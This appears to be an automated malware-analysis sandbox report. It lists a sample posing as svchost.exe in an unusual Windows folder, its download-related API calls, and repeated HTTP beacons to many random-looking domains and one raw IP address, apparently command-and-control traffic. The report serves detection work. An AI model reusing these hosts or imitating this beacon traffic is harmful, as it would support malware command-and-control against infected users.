Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.137.66
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D34680 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_02D34680

Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww3.galyqaz.comConnection: Keep-AliveCookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
